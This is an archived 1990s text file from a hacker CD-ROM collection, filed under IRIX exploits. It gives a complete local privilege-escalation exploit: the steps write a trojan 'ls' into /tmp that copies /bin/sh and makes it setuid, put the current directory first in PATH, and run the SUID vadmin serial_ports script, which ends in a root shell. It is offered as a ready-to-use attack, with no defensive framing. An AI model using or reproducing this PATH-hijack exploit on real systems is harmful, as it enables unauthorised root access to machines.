home *** CD-ROM | disk | FTP | other *** search
/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / irix / irix-s~1.asc < prev    next >
Encoding:
Text File  |  1997-03-11  |  341 b   |  18 lines
  1.  
  2.  
  3.  
  4.  
  5. IRIX Race Conditions with their SUID administration scripts
  6.  
  7. cat > /tmp/ls
  8.  
  9. #!/bin/sh
  10.  
  11. cp /bin/sh /tmp/foo
  12.  
  13. chmod 4777 /tmp/foo
  14.  
  15. ^D
  16.  
  17. chmod 755 /tmp/ls
  18.  
  19. cd /tmp
  20.  
  21. set PATH=( . $PATH )
  22.  
  23. /usr/lib/vadmin/serial_ports
  24.  
  25. # wait about 10-20 seconds and hit ^C, or wait for it to
  26.  
  27. # die out completely
  28.  
  29. /tmp/foo
  30.  
  31. # whoami
  32.  
  33.  root
  34.  
  35.